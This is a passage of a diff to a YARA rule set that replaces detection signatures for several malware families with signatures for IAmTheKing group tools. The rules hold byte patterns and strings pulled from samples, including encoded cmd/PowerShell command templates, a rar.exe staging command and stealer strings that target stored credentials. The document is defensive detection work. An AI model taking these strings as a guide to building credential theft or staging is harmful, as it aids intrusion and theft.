2b f3 83 c1 14 8d 04 56 03 c1 e8 [2] 02 00 8b f4 8d 85 f8 fe ff ff 50 8d 85 f0 fc ff ff 50 8d 85 f4 fd ff ff 50 50 68 78 50 47 00 56 ff 15 a0 a1 45 00 8b ce 83 c4 18 8d 51 01 8a 01 41 84 c0 75 f9 33 db 8d 85 ec fc ff ff 53 50 2b ca 51 56 57 ff 15 88 a0 45 00 57 ff 15 7c a0 45 00 53 53 53 8d 85 f8 fe ff ff 50 68 [2] 45 00 53 ff 15 94 a1 45 00 8d a5 e0 fc ff ff 5f 5e 5b 8b } - $s4 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 68 [2] 46 00 68 [2] 46 00 68 [2] 46 00 6a 11 e8 c6 fb ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c 8b ce ff 75 08 ff 15 a8 a1 45 00 ff d6 eb 14 6a 00 ff 75 0c ff 75 08 ff 15 4c a1 45 00 50 e8 d6 00 00 00 8b 4d fc 33 cd 5e e8 [2] fe ff 8b e5 } - $s5 = { 8b ec 6a ff 68 [2] 45 00 64 a1 00 00 00 00 50 83 ec 44 a1 34 52 47 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 3d 04 a0 45 00 68 00 00 00 f0 6a 01 6a 00 6a 00 56 c7 06 00 00 00 00 ff d7 85 c0 75 60 ff 15 54 a0 45 00 6a 08 6a 01 6a 00 68 [2] 45 00 56 8b d8 ff d7 85 c0 75 46 6a 28 6a 01 50 68 [2] 45 00 56 ff d7 85 c0 75 35 53 ff 15 58 a0 45 00 68 [2] 45 00 8d 4d d8 e8 ?? 8a fd ff 8d 45 d8 c7 45 fc 00 00 00 00 50 8d 4d b0 e8 d3 00 00 00 68 [2] 47 00 8d 45 b0 50 e8 [2] 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 [2] 00 00 } + $s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 } + $s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 } + $s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii + $s4 = "\\1-driver-vmsrvc" fullword ascii + $s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a } + $s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 } condition: - uint16(0)==0x5A4D and filesize >100KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >35KB and 4 of ($s*) } -rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE { meta: - description = "Detect MailDrop malware used by APT34" + description = "Detect QueenOfHearts malware" author = "Arkbird_SOLG" - id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e" - date = "2021-04-03" - modified = "2021-04-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24" + id = "763b35dd-6515-5ae8-a539-200a3647f074" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c" + logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083" score = 75 quality = 75 tags = "FILE" - hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504" - hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393" + hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba" + hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864" + hash3 = "f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f" + tlp = "White" + adversary = "IAmTheKing" strings: - $EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 } - $EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a } - $EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a } - $EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 } - $s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii - $s2 = "https://{0}/ews/exchange.asmx" fullword wide - $s3 = "Send_Log" fullword ascii - $s4 = "CheckEWSConnection" fullword ascii - $s5 = "Done:D" fullword wide - $s6 = "ExecAllCmds" fullword ascii - $s7 = "ExchangeUri" fullword ascii - $s8 = "get_cmdSubject" fullword ascii + $s1 = "send request error:%d" fullword ascii + $s2 = "cookie size :%d" fullword wide + $s3 = "querycode error" fullword wide + $s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a } + $s5 = "PmMytex%d" fullword wide + $s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a } + $s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 } + $s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 } condition: - uint16(0)==0x5a4d and filesize >20KB and 2 of ($EWS*) and 5 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE { meta: - description = "Detect KPot stealer (new variant October 2020)" + description = "Detect a keylogger used by IAmTheKing group" author = "Arkbird_SOLG" - id = "316feeb3-59e5-5d18-9800-db41fabd6cb0" - date = "2020-10-17" - modified = "2020-10-17" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40" + id = "186dc5f5-5cc2-551a-a34c-e775085e7f89" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c" + logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8" score = 75 - quality = 73 + quality = 71 tags = "FILE" - hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057" + hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915" + hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3" + tlp = "White" + adversary = "IAmTheKing" strings: - $olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii - $olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide - $olds3 = "%s\\%s\\%s-Qt" fullword wide - $olds4 = "%s\\%s\\%.6ss" fullword wide - $olds5 = "%s\\%s\\%s.vdf" fullword wide - $olds6 = "https://%S/a/%S" fullword wide - $olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 } - $debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii - $debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii - $debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii - $debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii - $debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii - $debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii - $debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii - $debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii - $debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii - $debug10 = "2|EarthVPN||%s|%s|" fullword ascii - $debug11 = "2|NordVPN||%s|%s|" fullword ascii - $debug12 = "0|%s|%S|%s|%s|%s" fullword ascii - $debug13 = "0|%S|%s|%s|%s|%S" fullword ascii - $debug14 = "0|%s|%s|%s|%s|" fullword ascii - $debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii - $op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii - $op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 } - $op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii - $op4 = "monero-project" fullword ascii + $s1 = "sonme hting is wrong x" fullword ascii + $s2 = { 25 73 25 73 25 73 25 73 } + $s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 } + $s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d } + $s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 } + $s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 } condition: - uint16(0)==0x5a4d and filesize >120KB and 4 of ($olds*) and 10 of ($debug*) and 2 of ($op*) + uint16(0)==0x5a4d and filesize >25KB and 5 of ($s*) } -rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE { meta: - description = "Detect Tardigrade loader" + description = "Detect PowerPool malware (ALPC exploit variant)" author = "Arkbird_SOLG" - id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0" - date = "2021-11-22" - modified = "2021-11-23" - reference = "https://www.isac.bio/post/tardigrade" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19" + id = "2988e9a8-da43-51fb-bd39-44aa1d161120" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23" license_url = "N/A" - logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c" + logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086" score = 75 quality = 75 tags = "FILE" - hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be" - hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858" - hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe" - tlp = "white" - adversary = "Tardigrade" + hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5" + hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24" + hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd" + tlp = "White" + adversary = "IAmTheKing" strings: - $s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 } - $s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 } - $s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 } - $s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 } + $s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } + $s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 } + $s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 } + $s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 } + $s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 } + $s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 } condition: - uint16(0)==0x5a4d and filesize >50KB and all of them + uint16(0)==0x5a4d and filesize >100KB and 5 of ($s*) } -rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE +rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE { meta: - description = "Detect Thor variant of PlugX (Variant 1)" + description = "Detect Screen Capture utility" author = "Arkbird_SOLG" - id = "5447e5df-0326-5987-905b-bfc49acee05a" - date = "2021-07-27" - modified = "2021-07-28" - reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20" + id = "09e4295e-454a-519a-964e-c5295e603aef" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73" + logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93" - hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87" - hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53" - hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01" - tlp = "white" - adversary = "Chinese APT group" + hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e" + tlp = "White" + adversary = "IAmTheKing" strings: - $s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff } - $s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff } - $s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff } + $s1 = "@MyScreen.jpg" fullword wide + $s2 = "DISPLAY" fullword wide + $s3 = "_invoke_watson" fullword ascii + $s4 = "GdipSaveImageToStream" fullword ascii + $s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 } condition: - uint16(0)==0x5A4D and filesize >25KB and all of ($s*) + uint16(0)==0x5a4d and ( filesize >8KB and filesize <60KB) and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE { meta: - description = "Detect Cadelspy stealer" + description = "Detect SlothfulMedia malware" author = "Arkbird_SOLG" - id = "bac23ed9-f51c-546e-8f4e-320d33b51829" - date = "2021-05-30" - modified = "2021-06-05" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24" + id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1" + date = "2021-07-09" + modified = "2021-07-12" + reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26" license_url = "N/A" - logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656" + logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff" - hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068" - hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391" + hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb" + hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae" + hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5" tlp = "White" - adversary = "APT39" - - strings: - $str1 = "C:\\Windows\\SysEvent.exe" fullword wide - $str2 = "\\sysprep\\sysprep.exe" fullword wide - $str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide - $str4 = "@C:\\Windows\\systemw.dll" fullword wide - $str5 = "systemw.dll" fullword ascii - $str6 = "ApAshell32.dll" fullword wide - $seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 } - $seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b } - $seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 } - - condition: - uint16(0)==0x5a4d and filesize >30KB and 5 of ($str*) and 2 of ($seq*) -} -rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE -{ - meta: - description = "Detect CRing ransomware" - author = "Arkbird_SOLG" - id = "3648494d-8c27-5767-90e8-45e294aac382" - date = "2021-04-08" - modified = "2021-04-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19" - license_url = "N/A" - logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c" - score = 50 - quality = 75 - tags = "FILE" - hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb" - hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8" - hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be" - level = "Experimental" + adversary = "IAmTheKing" strings: - $str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 